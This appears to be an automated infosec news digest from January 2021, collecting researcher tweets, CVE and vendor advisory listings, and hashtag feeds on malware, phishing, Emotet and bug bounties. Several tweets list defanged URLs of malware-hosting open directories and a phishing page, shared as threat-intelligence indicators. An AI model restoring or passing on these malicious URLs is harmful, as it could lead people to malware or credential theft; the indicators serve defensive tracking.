JCyberSec_: @peterkruse @ffforward @Office365 @malwrhunterteam @ActorExpose @illegalFawn @phishunt_io @ANeilan @ps66uk @Pawp81 Can you DM me a link to your presentation please. I'd be very interested to take a read. Thanks!

JCyberSec_: @ffforward @peterkruse @Office365 @malwrhunterteam @ActorExpose @illegalFawn @phishunt_io @ANeilan @ps66uk @Pawp81 I'd agree. Ex-Rob uses a : after the authoriseID parameter. The fingerprint isn't the same with this kit.

JCyberSec_: @phishbox @ActorExpose He's a massive script kiddie with no OpSec whatsoever...

nullcookies: Heads up. https://t.co/pkjSb8plDI

nullcookies: @ScottMcGready https://t.co/1l6XCB6wNR

nullcookies: I’m already ruining someone’s day today who wanted to play in the pandemic phishing pool. Rip and tear.

campuscodi: @UnderTheBreach Don't think it helps much, though. Google made it pretty clear who they are and how untouchable they're gonna be.

campuscodi: @iblametom No. Something else

campuscodi: @iblametom I wish that was the only thing they did 😬

SBousseaden: example of process execution flow resulting from a VisualStudio PreBuildEvent (Post as well) command execution https://t.co/L58JYXHIs2 https://t.co/QJ1ypstPCi

SBousseaden: a good example of why its important to always try to catch/capture clean-up state for known key techniques. https://t.co/yGwY6HoF4U

424f424f: @strandjs A big BBS

lazyactivist192: @BrittonCallie @Statebird2 @leahmcelrath @gtconway3d Ooof read the room

lazyactivist192: @IndigenousX The hurons. The iroquois league decimated huronia as punishment for accepting refugees who sided with the french (and against the iroquois).

cyber__sloth: @TheHackersNews Never save credentials on your browser, if your computer gets infectef with a stealer, all are gone. Always use password manager and 2FA

FewAtoms: #malware #infosecurity #threathunting #cybersecurity #opendir hxxp://minishop.in/shop/22601600012/ @abuse_ch @James_inthe_box https://t.co/qJMppatRMw

FewAtoms: @jstrosch @James_inthe_box @JAMESWT_MHT may be related: hxxp://91.219.61.224/my/ https://t.co/rAIiSx7qNS

FewAtoms: #malware #opendir #infosecurity #threathunting #cybersecurity hxxp://tunedinblog.com/wp-includes/?C=M;O=D https://t.co/YF3Cc3o5Tu

reecdeep: @VirITeXplorer @58_158_177_102 @csirt_it @AgidCert @guelfoweb @JAMESWT_MHT @FBussoletti ⚙️https://t.co/vTqYIUpjUs

luc4m: @likethecoins @asfakian I was thinking I was alone 😂😅 Thanks 🙏 https://t.co/HDJuxMS8Zc

3xp0rtblog: @Bank_Security Nicely done, I am in waiting for a new blog-post. And remember poverty breeds crime.

3xp0rtblog: @Bank_Security I am funny to see when Cyber Intelligence companies are searching for workers with native English and Russian in the kit. It's so ridiculous. About Russian. Russian is versatile, therefore emulating is very hard.

----Vulners.com High Sev. Last 3 Days----

CVSS: 6.8 (RHSA-2021:0258) Moderate: cryptsetup security update

CVSS: 7.2 (RHSA-2021:0257) Important: net-snmp security update

CVSS: 7.2 N. Korean Hackers Targeting Security Experts to Steal Undisclosed Researches

CVSS: 7.1 (RHSA-2021:0250) Important: Red Hat JBoss Enterprise Application Platform 7.3.5 security update

CVSS: 7.1 (RHSA-2021:0248) Important: Red Hat JBoss Enterprise Application Platform 7.3.5 security update

CVSS: 7.1 (RHSA-2021:0247) Important: Red Hat JBoss Enterprise Application Platform 7.3.5 security update

CVSS: 7.1 (RHSA-2021:0246) Important: Red Hat JBoss Enterprise Application Platform 7.3.5 security update

CVSS: 6.5 Cisco DNA Center Bug Opens Enterprises to Remote Attack

CVSS: 7.5 Code Injection and Directory Traversal in plexus-utils

CVSS: 6.5 Security Bulletin: NVIDIA Jetson AGX Xavier Series, Jetson Xavier NX, TX1, TX2, Nano and Nano 2GB - January 2021

CVSS: 10.0 openSUSE Security Update : cobbler (openSUSE-2021-46)

CVSS: 6.8 openSUSE Security Update : gimp (openSUSE-2020-2357)

CVSS: 9.3 Fedora 32 : chromium (2021-d9faeff8eb)

CVSS: 6.8 openSUSE Security Update : nodejs10 (openSUSE-2021-65)

CVSS: 9.3 openSUSE Security Update : blosc (openSUSE-2020-2337)

CVSS: 6.8 Fedora 32 : python-pillow (2021-880aa7bd27)

CVSS: 6.8 Debian DSA-4836-1 : openvswitch - security update

CVSS: 7.2 openSUSE Security Update : crmsh (openSUSE-2021-55)

CVSS: 9.3 openSUSE Security Update : xstream (openSUSE-2021-140)

CVSS: 6.8 openSUSE Security Update : slurm_18_08 (openSUSE-2020-2286)

CVSS: 7.2 openSUSE Security Update : crmsh (openSUSE-2021-73)

CVSS: 6.8 GLSA-202101-19 : OpenJDK: Multiple vulnerabilities

CVSS: 7.5 openSUSE Security Update : kitty (openSUSE-2021-25)

CVSS: 6.8 openSUSE Security Update : nodejs12 (openSUSE-2021-64)

CVSS: 6.8 openSUSE Security Update : MozillaFirefox (openSUSE-2020-2318)

CVSS: 7.2 GLSA-202101-21 : Flatpak: Sandbox escape

CVSS: 10.0 openSUSE Security Update : hawk2 (openSUSE-2021-54)

CVSS: 7.5 openSUSE Security Update : python3 (openSUSE-2020-2332)

CVSS: 10.0 openSUSE Security Update : hawk2 (openSUSE-2021-144)

CVSS: 6.8 openSUSE Security Update : gimp (openSUSE-2021-27)

CVSS: 9.3 openSUSE Security Update : chromium (openSUSE-2021-40)

CVSS: 6.8 openSUSE Security Update : MozillaThunderbird (openSUSE-2020-2324)

CVSS: 7.5 openSUSE Security Update : python3 (openSUSE-2020-2333)

CVSS: 6.8 PEAR Archive_Tar Arbitrary File Write

CVSS: 7.2 GLSA-202101-15 : VirtualBox: Multiple vulnerabilities

CVSS: 7.5 FreeBSD : chocolate-doom -- Arbitrary code execution (35aef72c-5c8e-11eb-8309-4ccc6adda413)

CVSS: 7.5 Debian DSA-4837-1 : salt - security update

CVSS: 9.3 openSUSE Security Update : chromium (openSUSE-2021-41)

CVSS: 6.8 GLSA-202101-20 : glibc: Multiple vulnerabilities

CVSS: 6.8 openSUSE Security Update : MozillaFirefox (openSUSE-2020-2325)

CVSS: 6.8 openSUSE Security Update : wavpack (openSUSE-2021-153)

CVSS: 6.8 openSUSE Security Update : nodejs10 (openSUSE-2021-82)

CVSS: 6.8 openSUSE Security Update : wavpack (openSUSE-2021-154)

CVSS: 10.0 Fedora 33 : PyYAML (2021-3342569a0f)

CVSS: 6.8 Debian DSA-4834-1 : vlc - security update

CVSS: 6.8 openSUSE Security Update : MozillaThunderbird (openSUSE-2020-2317)

CVSS: 6.8 openSUSE Security Update : vlc (openSUSE-2021-91)

CVSS: 6.8 openSUSE Security Update : vlc (openSUSE-2021-76)

CVSS: 9.3 openSUSE Security Update : opera (openSUSE-2021-139)

CVSS: 9.3 openSUSE Security Update : opera (openSUSE-2021-138)

CVSS: 7.2 openSUSE Security Update : the Linux Kernel (openSUSE-2021-75)

CVSS: 6.8 openSUSE Security Update : ImageMagick (openSUSE-2021-136)

CVSS: 7.2 openSUSE Security Update : the Linux Kernel (openSUSE-2021-60)

CVSS: 7.8 IBM MQ 8.0.0.6 (293271)

CVSS: 6.8 openSUSE Security Update : webkit2gtk3 (openSUSE-2020-2304)

CVSS: 6.8 SUSE SLES12 Security Update : ImageMagick (SUSE-SU-2021:0199-1)

CVSS: 7.5 MobileIron MDM Hessian-Based Java Deserialization Remote Code Execution

CVSS: 6.8 openSUSE Security Update : webkit2gtk3 (openSUSE-2020-2310)

CVSS: 9.3 openSUSE Security Update : MozillaFirefox (openSUSE-2020-2315)

CVSS: 9.3 openSUSE Security Update : opera (openSUSE-2020-2359)

CVSS: 6.8 openSUSE Security Update : ImageMagick (openSUSE-2021-148)

CVSS: 7.5 openSUSE Security Update : clamav (openSUSE-2020-2276)

CVSS: 7.5 openSUSE Security Update : clamav (openSUSE-2020-2268)

CVSS: 9.3 openSUSE Security Update : opera (openSUSE-2020-2360)

CVSS: 10.0 openSUSE Security Update : hawk2 (openSUSE-2021-147)

CVSS: 10.0 openSUSE Security Update : hawk2 (openSUSE-2021-74)

CVSS: 6.8 openSUSE Security Update : slurm_18_08 (openSUSE-2021-96)

CVSS: 7.5 Ubuntu 16.04 LTS : Pound vulnerabilities (USN-4702-1)

CVSS: 7.5 Pound vulnerabilities

CVSS: 7.5 Beware! Fully-Functional Exploit Released Online for SAP Solution Manager Flaw

----NVD Last 3 Days----

CVE#: CVE-2020-17532 Published Date: 2021-01-25 CVSS: NO CVSS Description: When handler-router component is enabled in servicecomb-java-chassis, authenticated user may inject some data and cause arbitrary code execution.

The problem happens in versions between 2.0.0 ~ 2.1.3 and fixed in Apache ServiceComb-Java-Chassis 2.1.5

CVE#: CVE-2021-21272 Published Date: 2021-01-25 CVSS: NO CVSS Description: ORAS is open source software which enables a way to push OCI Artifacts to OCI Conformant registries. ORAS is both a CLI for initial testing and a Go Module.

In ORAS from version 0.4.0 and before version 0.9.0, there is a "zip-slip" vulnerability.

The directory support feature allows the downloaded gzipped tarballs to be automatically extracted to the user-specified directory where the tarball can have symbolic links and hard links.

A well-crafted tarball or tarballs allow malicious artifact providers linking, writing, or overwriting specific files on the host filesystem outside of the user-specified directory unexpectedly with the same permissions as the user who runs `oras pull`.

Users of the affected versions are impacted if they are `oras` CLI users who runs `oras pull`, or if they are Go programs, which invoke `github.com/deislabs/oras/pkg/content.FileStore`.

The problem has been fixed in version 0.9.0.

For `oras` CLI users, there is no workarounds other than pulling from a trusted artifact provider.

For `oras` package users, the workaround is to not use `github.com/deislabs/oras/pkg/content.FileStore`, and use other content stores instead, or pull from a trusted artifact provider.

CVE#: CVE-2021-21275 Published Date: 2021-01-25 CVSS: NO CVSS Description: The MediaWiki "Report" extension has a Cross-Site Request Forgery (CSRF) vulnerability. Before fixed version, there was no protection against CSRF checks on Special:Report, so requests to report a revision could be forged.

The problem has been fixed in commit f828dc6 by making use of MediaWiki edit tokens.

CVE#: CVE-2021-23901 Published Date: 2021-01-25 CVSS: NO CVSS Description: An XML external entity (XXE) injection vulnerability was discovered in the Nutch DmozParser and is known to affect Nutch versions < 1.18. XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access. This issue is fixed in Apache Nutch 1.18.

----#MALWARE----

4w4r44: RT @0xthreatintel: Reversing APT Tool : SManager (Unpacked) https://t.co/g22cZgnauL cc: @malwrhunterteam @Arkbird_SOLG @JAMESWT_MHT @Jame… Link with Tweet

akawombat42: RT @PhishStats: https://t.co/MAuIXRvYiq detected 48 new websites hosting #phishing | new today: 53 | #infosec #cybersecurity #malware https… Link with Tweet

0ct4vian: RT @keepnetlabs: 2020 #Cybersecurity Review https://t.co/XHqv53k0Wf #security #infosecurity #phishing #malware #ransomware #emailsecurity… Link with Tweet

FreezoneIsm: RT @TheHackersNews: Watch Out, #Infosec! In an ongoing #cyberattack campaign, North Korean hackers are approaching security experts—workin…

0ct4vian: RT @cybersecboardrm: WHATSAPP users already concerned about privacy policies...have been handed another reason to delete the app - it's bei…

Ericom_Software: This @ZDNet article reports that hackers targeted #cybersecurity researchers through multiple social media profiles… https://t.co/WA541ZVG2p Link with Tweet

sectest9: RT @gtbarry: The worldwide cybersecurity market is set to grow by up to 10% this year to top $60bn, as the global economy slowly recovers f…

LisaCalighan: RT @keepnetlabs: 2020 #Cybersecurity Review https://t.co/XHqv53k0Wf #security #infosecurity #phishing #malware #ransomware #emailsecurity… Link with Tweet

iotcybersec24: RT @keepnetlabs: 2020 #Cybersecurity Review https://t.co/XHqv53k0Wf #security #infosecurity #phishing #malware #ransomware #emailsecurity… Link with Tweet

sectest9: RT @keepnetlabs: 2020 #Cybersecurity Review https://t.co/XHqv53k0Wf #security #infosecurity #phishing #malware #ransomware #emailsecurity… Link with Tweet

sectest9: RT @CSA2LLC: Russian hack of US agencies exposed supply chain weaknesses #RussianHackers #SupplyChain #MaliciousCode #Malware #USGovernment…

gtbarry: The worldwide cybersecurity market is set to grow by up to 10% this year to top $60bn, as the global economy slowly… https://t.co/TCn3gx7PpG Link with Tweet

CSA2LLC: Russian hack of US agencies exposed supply chain weaknesses #RussianHackers #SupplyChain #MaliciousCode #Malware… https://t.co/Xx714onxDn Link with Tweet

keepnetlabs: 2020 #Cybersecurity Review https://t.co/XHqv53k0Wf #security #infosecurity #phishing #malware #ransomware… https://t.co/ZZ11hAN4xw Link with Tweet Link with Tweet

InfoSec_Pom: Free Threat Intelligence feed - https://t.co/q1yOWjgK9G https://t.co/qpXvekqf8u The U.S. wants smartphone location… https://t.co/dqN5pELdkW Link with Tweet Link with Tweet Link with Tweet

----#PHISHING----

akawombat42: RT @PhishStats: https://t.co/MAuIXRvYiq detected 48 new websites hosting #phishing | new today: 53 | #infosec #cybersecurity #malware https… Link with Tweet

0ct4vian: RT @keepnetlabs: 2020 #Cybersecurity Review https://t.co/XHqv53k0Wf #security #infosecurity #phishing #malware #ransomware #emailsecurity… Link with Tweet

GibbonsMatthew: RT @CyberNews_com: Mobile #phishing #attacks can fool even the smartest of us. But it’s not always greater sophistication that enables succ…

JRoosen: RT @JAMESWT_MHT: #Phishing #webmail login Action Required: ✉ You have [9] quarantined messages http://clickandprints.[com/mail/webmail.ph…

opensource_orgs: RT @StephenMendez_: ❗️Project Announcement❗️ #Wanami: an #opensource web browser focused on preventing high risk, low visibility web based…

StephenMendez_: ❗️Project Announcement❗️ #Wanami: an #opensource web browser focused on preventing high risk, low visibility web b… https://t.co/74v6zYPRTp Link with Tweet

LisaCalighan: RT @keepnetlabs: 2020 #Cybersecurity Review https://t.co/XHqv53k0Wf #security #infosecurity #phishing #malware #ransomware #emailsecurity… Link with Tweet

iotcybersec24: RT @keepnetlabs: 2020 #Cybersecurity Review https://t.co/XHqv53k0Wf #security #infosecurity #phishing #malware #ransomware #emailsecurity… Link with Tweet

sectest9: RT @keepnetlabs: 2020 #Cybersecurity Review https://t.co/XHqv53k0Wf #security #infosecurity #phishing #malware #ransomware #emailsecurity… Link with Tweet

TeamDreier: #phishing Bank phishing and brand copycat nest Full dataset (8TB) analysis of NS *.dnspod.com IP reuse and graph p… https://t.co/T0xfiI2U4m Link with Tweet

----#OSINT----

chandlertwilson: Looking better in the #UK for now. #OSINT + #machine one-pager on @jlpartnership announcing the early repayment of… https://t.co/EE6jfJKTmT Link with Tweet

aleks_caldaras: RT @dutch_osintguy: Thank you @MaltegoHQ for the personal letter and swag! Really appreciated 😃 #osint https://t.co/NItnaMxyhT

WarVsPeaceOrg: #Russia|n #Navy deployments acknowledged by the government as of 24 January 2021. #OSINT #ВМФ… https://t.co/Me6RmrMkUe Link with Tweet

dutch_osintguy: Thank you @MaltegoHQ for the personal letter and swag! Really appreciated 😃 #osint https://t.co/NItnaMxyhT

BriTellsStories: RT @osinteditor: Impressive work by community member @searchish_site https://t.co/xmjw2goRVa A comprehensive look into corporate research,… Link with Tweet

Knowsint1: RT @OSINTtechniques: 2020 Social Media Map. If you want live links, download here -> https://t.co/6GNky2IpEo #OSINT #SOCMINT https://t.co/Z… Link with Tweet

iSecurity: G-HUNT osint tool for extracting information from any Google Account using an email. https://t.co/wgFYxgaO5u #cybersecurity #hacking #osint Link with Tweet

A92E: RT @OSINTtechniques: 2020 Social Media Map. If you want live links, download here -> https://t.co/6GNky2IpEo #OSINT #SOCMINT https://t.co/Z… Link with Tweet

TRADECRAFT14: RT @VoxCroft: Other than operational intelligence, VoxCroft provides strategic and tactical intelligence to customers through topical analy…

bryanstrawser: RT @DrJoeBurton: Thanks @CHCyberPolicy - great to be part of such an interesting issue covering #CyberSecurity for healthcare, governance o…

pantarheio: RT @Isabella_Regan: Great read on 'How Open Source Experts Identified the US Capitol Rioters ' - now that there's rioting and looting in th…

tcstvns: RT @DrJoeBurton: Thanks @CHCyberPolicy - great to be part of such an interesting issue covering #CyberSecurity for healthcare, governance o…

origolga: RT @InformNapalm: Personal data of LLS Yamal sailors awarded for war crimes in #Crimea and #Syria. https://t.co/z1ImL3wfp8 This #OSINT in… Link with Tweet

YarnoRitzen: RT @Isabella_Regan: Great read on 'How Open Source Experts Identified the US Capitol Rioters ' - now that there's rioting and looting in th…

RDSWEB: RT @AaronCTI: #OSINT Query of the day - Does anyone know of any reliable SEO keyword tools that could be leveraged for OSINT purposes? I'm…

----#THREATINTEL----

simonroses: Interesting read -> New campaign targeting security researchers https://t.co/O5ehnkA62G #CyberSecurity #google… https://t.co/FLPqSHTgnq Link with Tweet Link with Tweet

Proteus_Cyber: Find the right TI tools with our help. #Threatintelligence is a reality, and it can be incredibly damaging if not c… https://t.co/eXQIIDiZZO Link with Tweet

Ch33r10: RT @fr0gger_: I updated the @virustotal VTI Dorks repo created by @cyb3rops to include a part for samples similarities! Check this out! #in…

cybsecbot: RT @cahill0701: To all my #SecurityResearcher friends, though I know you already are, be vigilant. Thanks for sharing @Google #ThreatInte…

cahill0701: To all my #SecurityResearcher friends, though I know you already are, be vigilant. Thanks for sharing @Google… https://t.co/Ws0tRvo71p Link with Tweet

ninoseki: RT @teamcymru: Team Cymru Research: We have updated our analysis of #GhostDNS to include recently observed attacker infrastructure. https:…

MrsYisWhy: teamcymru: Team Cymru Research: We have updated our analysis of #GhostDNS to include recently observed attacker inf… https://t.co/gb0Rn4eF5X Link with Tweet

teamcymru: Team Cymru Research: We have updated our analysis of #GhostDNS to include recently observed attacker infrastructure… https://t.co/92Cm8X9Z7B Link with Tweet

valkrider: RT @teamcymru: #Amazon #Kindle RCE Attack Starts with an #Email #threatintel #infosec https://t.co/FCScXkzSEM Link with Tweet

cyberreport_io: BlackBerry expands Baidu partnership to take autonomous driving to a higher gear https://t.co/GUxf677nXV… https://t.co/L40ziJZs78 Link with Tweet Link with Tweet

hacking_future: Deloitte & Touche Buys Threat-Hunting Firm https://t.co/yytEnhaGpQ #acquisition #threatintel via @DarkReading Link with Tweet

Cyber_APMG: Blog - Using the #darkweb for #Threat Intelligence. Bas van den Berg, from the @SECO_Institute, gives practical tip… https://t.co/mS3Cs1twDs Link with Tweet

AllysonTowle: RT @MicroFocusSA: What is cyber #ThreatIntelligence and how does it give businesses a better understanding of past, current, and future cyb…

DeoVolente11: RT @fr0gger_: I updated the @virustotal VTI Dorks repo created by @cyb3rops to include a part for samples similarities! Check this out! #in…

MarkPlant: RT @MicroFocusSA: What is cyber #ThreatIntelligence and how does it give businesses a better understanding of past, current, and future cyb…

----#RANSOMWARE----

0ct4vian: RT @keepnetlabs: 2020 #Cybersecurity Review https://t.co/XHqv53k0Wf #security #infosecurity #phishing #malware #ransomware #emailsecurity… Link with Tweet

sectest9: RT @gtbarry: The worldwide cybersecurity market is set to grow by up to 10% this year to top $60bn, as the global economy slowly recovers f…

LisaCalighan: RT @keepnetlabs: 2020 #Cybersecurity Review https://t.co/XHqv53k0Wf #security #infosecurity #phishing #malware #ransomware #emailsecurity… Link with Tweet

CyberSecurityN8: RT @ralf_ladner: Morgan Wright, Chief Security Advisor bei #Sentinelone, zu den Learnings der #Sunburst-Kampagne #Cyberdefense #Cyberkrimi…

Mulugah1: RT @MVPWorks: What a nightmare: A ransomware attack forced Baltimore County public schools to close. Did you know that ransomware could do…

iotcybersec24: RT @keepnetlabs: 2020 #Cybersecurity Review https://t.co/XHqv53k0Wf #security #infosecurity #phishing #malware #ransomware #emailsecurity… Link with Tweet

ralf_ladner: Morgan Wright, Chief Security Advisor bei #Sentinelone, zu den Learnings der #Sunburst-Kampagne #Cyberdefense… https://t.co/Sanq7Algby Link with Tweet

sectest9: RT @keepnetlabs: 2020 #Cybersecurity Review https://t.co/XHqv53k0Wf #security #infosecurity #phishing #malware #ransomware #emailsecurity… Link with Tweet

MainNerve: Some believe that cyber attackers will change from ransoms to exfiltrating data. https://t.co/ynTHuQ25yO… https://t.co/nDqHCfsI0t Link with Tweet Link with Tweet

sectest9: RT @MVPWorks: What a nightmare: A ransomware attack forced Baltimore County public schools to close. Did you know that ransomware could do…

MVPWorks: What a nightmare: A ransomware attack forced Baltimore County public schools to close. Did you know that ransomware… https://t.co/6yal28uH5u Link with Tweet

ThirdWallPlugin: Combating Ransomware: What the Third Wall Means for You. https://t.co/m86qRhqads #ThirdWall #Cybersecurity… https://t.co/Wqu1lNFE5Y Link with Tweet Link with Tweet

CyberSecurityN8: RT @ptrancyber: Another #ransomware gang is now using #DDoS #cyberattacks to force a victim to contact them and negotiate a ransom. https:/…

gtbarry: The worldwide cybersecurity market is set to grow by up to 10% this year to top $60bn, as the global economy slowly… https://t.co/TCn3gx7PpG Link with Tweet

keepnetlabs: 2020 #Cybersecurity Review https://t.co/XHqv53k0Wf #security #infosecurity #phishing #malware #ransomware… https://t.co/ZZ11hAN4xw Link with Tweet Link with Tweet

-----#OPENDIR----

-----#MALSPAM----

vl_sk: RT @malware_traffic: 2021-01-23 (Saturday) - Here's an #Emotet #malspam message I got over the weekend - The password is wrong, though, so…

mansoor_ranchi: RT @malware_traffic: 2021-01-23 (Saturday) - Here's an #Emotet #malspam message I got over the weekend - The password is wrong, though, so…

HerbieZimmerman: RT @malware_traffic: 2021-01-23 (Saturday) - Here's an #Emotet #malspam message I got over the weekend - The password is wrong, though, so…

Securityblog: RT @malware_traffic: 2021-01-23 (Saturday) - Here's an #Emotet #malspam message I got over the weekend - The password is wrong, though, so…

NetRng31: RT @malware_traffic: 2021-01-23 (Saturday) - Here's an #Emotet #malspam message I got over the weekend - The password is wrong, though, so…

hacker3j: RT @malware_traffic: 2021-01-23 (Saturday) - Here's an #Emotet #malspam message I got over the weekend - The password is wrong, though, so…

gh0std4ncer: RT @malware_traffic: 2021-01-23 (Saturday) - Here's an #Emotet #malspam message I got over the weekend - The password is wrong, though, so…

kilijanek: RT @malware_traffic: 2021-01-23 (Saturday) - Here's an #Emotet #malspam message I got over the weekend - The password is wrong, though, so…

dragon199421: RT @malware_traffic: 2021-01-23 (Saturday) - Here's an #Emotet #malspam message I got over the weekend - The password is wrong, though, so…

Cryptolaemus1: RT @malware_traffic: 2021-01-23 (Saturday) - Here's an #Emotet #malspam message I got over the weekend - The password is wrong, though, so…

amoghnagaraj: RT @malware_traffic: 2021-01-23 (Saturday) - Here's an #Emotet #malspam message I got over the weekend - The password is wrong, though, so…

jc_campu: RT @malware_traffic: 2021-01-23 (Saturday) - Here's an #Emotet #malspam message I got over the weekend - The password is wrong, though, so…

InfosecFam: RT @malware_traffic: 2021-01-23 (Saturday) - Here's an #Emotet #malspam message I got over the weekend - The password is wrong, though, so…

JRoosen: RT @malware_traffic: 2021-01-23 (Saturday) - Here's an #Emotet #malspam message I got over the weekend - The password is wrong, though, so…

cybsecbot: RT @malware_traffic: 2021-01-23 (Saturday) - Here's an #Emotet #malspam message I got over the weekend - The password is wrong, though, so…

----#EMOTET----

Giwrgosma: RT @dor0n1: #emotet rocks germany https://t.co/l5aZM2GV4x https://t.co/h6IXzaOJGh .doc anyone? Link with Tweet Link with Tweet

dor0n1: #emotet rocks germany https://t.co/l5aZM2GV4x https://t.co/h6IXzaOJGh .doc anyone? Link with Tweet Link with Tweet

gh0std4ncer: RT @sec_soup: Was taking a look at this zipped #Emotet over my lunch break and the password is indeed incorrect. The right password was 'e4…

AntiVirusLV: RT @anyrun_app: TOP10 last week's threats by uploads ⬆️ #Emotet 1547 (954) ⬇️ #NjRAT 282 (320) ⬆️ #FormBook 206 (161) ⬆️ #Remcos 157 (134)…

cybertotz: RT @Cryptolaemus1: #Emotet Daily Summary for 2021/01/25: Ivan started the day off with a bang but went out with a whimper just after noon U…

JAMESWT_MHT: RT @Cryptolaemus1: #Emotet Daily Summary for 2021/01/25: Ivan started the day off with a bang but went out with a whimper just after noon U…

0x4d_: RT @Cryptolaemus1: #Emotet Daily Summary for 2021/01/25: Ivan started the day off with a bang but went out with a whimper just after noon U…

YourAnonRiots: RT @Cryptolaemus1: #Emotet C2 Update as of 2021/01/25: Same T1 C2s we saw change on bots for E2/E3 on Sun are now in distro this morning. E…

KanbeWorks: RT @Cryptolaemus1: #Emotet Daily Summary for 2021/01/25: Ivan started the day off with a bang but went out with a whimper just after noon U…

FlohEinstein: RT @Cryptolaemus1: #Emotet Daily Summary for 2021/01/25: Ivan started the day off with a bang but went out with a whimper just after noon U…

Paladin3161: RT @Cryptolaemus1: #Emotet Daily Summary for 2021/01/25: Ivan started the day off with a bang but went out with a whimper just after noon U…

JRoosen: RT @Cryptolaemus1: #Emotet Daily Summary for 2021/01/25: Ivan started the day off with a bang but went out with a whimper just after noon U…

thlnk3r: RT @Cryptolaemus1: #Emotet C2 Update as of 2021/01/25: Same T1 C2s we saw change on bots for E2/E3 on Sun are now in distro this morning. E…

wepIV: RT @AhegaoTony: Anybody getting false positives from Windows Defender for “TrojanDownloader:O97M/Emotet.RR!MTB”? Looks to have started ~3 d…

Myrtus0x0: RT @Cryptolaemus1: #Emotet Daily Summary for 2021/01/25: Ivan started the day off with a bang but went out with a whimper just after noon U…

-----#BUGBOUNTY----

Sarim_Razaa: RT @FaniMalikHack: Recon MindMap Recon Master-plan🔥 Recon is usually a preliminary step toward a further attack seeking to exploit the tar…

atluxity: RT @FaniMalikHack: Recon MindMap Recon Master-plan🔥 Recon is usually a preliminary step toward a further attack seeking to exploit the tar…

native_stack: RT @disclosedh1: TTS Bug Bounty disclosed a bug submitted by puppykok: https://t.co/6ZlY4E6Sfk - Bounty: $750 #hackerone #bugbounty https:/… Link with Tweet

good_sector: RT @the_vyAdha: #bugbounty #bugbountytips Found a $$$$ RCE with CVE-2018-15473 Steps : 1. Found an IP of the company eg: https://t.co/sH…

yuyhiraka: RT @FaniMalikHack: OAuth 2.0 Hacking Here is a mindmap about hacking OAuth 2.0. cover all possible ways even with low impact. Credit:-@hac…

s0meguy1: RT @AmitMDubey: Making public my XSS cheatsheet which I am been referring from a long time. I have been collecting this payload since I sta…

bypasstp: RT @FaniMalikHack: OAuth 2.0 Hacking Here is a mindmap about hacking OAuth 2.0. cover all possible ways even with low impact. Credit:-@hac…

greyninja9619: RT @sunilyedla2: Found ATO just now! 1. Found Open redirection in sign in endpoint 2. Enter attackers server (I’ve used ngrok server) and t…

trozonsec: RT @naglinagli: Let's have a little recon challenge I have placed 10 unique subdomains on my main blog: https://t.co/Z6IPqT8o8p I wonder i… Link with Tweet

ken5scal: RT @FaniMalikHack: OAuth 2.0 Hacking Here is a mindmap about hacking OAuth 2.0. cover all possible ways even with low impact. Credit:-@hac…

john_k57: RT @FaniMalikHack: Recon MindMap Recon Master-plan🔥 Recon is usually a preliminary step toward a further attack seeking to exploit the tar…

ErSurajShukla: RT @sec_r0: Today let's learn diff b/w basic AuthN & session-based AuthN. #web auth made easy. #infosec #security #appsec #webdesign #WebD…

FeliciPierluigi: RT @FaniMalikHack: OAuth 2.0 Hacking Here is a mindmap about hacking OAuth 2.0. cover all possible ways even with low impact. Credit:-@hac…

payloadartist: Lately I have seen a lot of Recon-as-a-Service platforms coming up, @SpyseHQ really stands out as a #cybersecurity… https://t.co/kmtcaJqpRZ Link with Tweet

abh1sek_r: RT @FaniMalikHack: Recon MindMap Recon Master-plan🔥 Recon is usually a preliminary step toward a further attack seeking to exploit the tar…

----#CYBERCRIME----

MoreyHaber: RT @BeyondTrust: As the Covid-19 pandemic enters what may be its most dangerous phase, how can healthcare organisations fight increased cyb…

sectest9: RT @anuragbaghla: Got invited by PTC News for the *Panel Discussion* on use of Smartphones by Gangsters in Punjab (India) jails. https://…

beefyspace: RT @anuragbaghla: Got invited by PTC News for the *Panel Discussion* on use of Smartphones by Gangsters in Punjab (India) jails. https://…

the404code: RT @anuragbaghla: Got invited by PTC News for the *Panel Discussion* on use of Smartphones by Gangsters in Punjab (India) jails. https://…

pdboyes: RT @BeyondTrust: As the Covid-19 pandemic enters what may be its most dangerous phase, how can healthcare organisations fight increased cyb…

NamesOfLondon: #Cybercrime #Security #Internet @Verisign #IoT 👇 Is it Possible to Take Down the Internet https://t.co/g36Z0mNGVT Link with Tweet

sectest9: RT @esafetymatters: #Fraud epidemic is now national security threat. @BBCNews tells us more here: https://t.co/kHU7y410Po #CyberCrime #Onl… Link with Tweet

ThirdWallPlugin: Combating Ransomware: What the Third Wall Means for You. https://t.co/m86qRhqads #ThirdWall #Cybersecurity… https://t.co/Wqu1lNFE5Y Link with Tweet Link with Tweet

CyberSecurityN8: RT @esafetymatters: #Fraud epidemic is now national security threat. @BBCNews tells us more here: https://t.co/kHU7y410Po #CyberCrime #Onl… Link with Tweet

supplymybiz: #Cybersecurity Risk Calculator - Not sure about the potential exposure to #Cybercrime in your business? Try it FREE… https://t.co/v6uhkEHP7a Link with Tweet

CSTG_Omaha: Be careful on what applications that installed on your phone it could cause security issues at the office… https://t.co/nMB0fg1kdd Link with Tweet

esafetymatters: #Fraud epidemic is now national security threat. @BBCNews tells us more here: https://t.co/kHU7y410Po #CyberCrime… https://t.co/YF97H9pfl1 Link with Tweet Link with Tweet

DC_CyberProtect: Be it a text message or an email, the NHS is warning people to be vigilant about fake invitations to have the coron… https://t.co/8ehl3PQITz Link with Tweet

PentestPeople: Canadian Company "Nefilim" Ransomware Attack Results In Data Leaked On The Dark Web. We hope this gets sorted as s… https://t.co/07WXnAoobX Link with Tweet

----Hacking Updates----

gkupsaw updated javascript-raytracer. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-23. --- A raytracer and scene parser implemented in JavaScript (Hack at Brown submission)

e11en updated hack-game. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-24. --- A HTML5 + JS game teaching you how to hack

Sushreesatarupa updated corona_cARe.github.io. This repo has 0 stars and 1 watchers. This repo was created on 2020-11-08. --- TechTogether Boston-WINNER-echoAR Best AR/VR hack-Interactive AR based COVID statistics and information providing web-app with an addictive covid game

Zormayel updated zormayel.github.io. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-24. --- Cybersecurity / Pentesting / Hacking

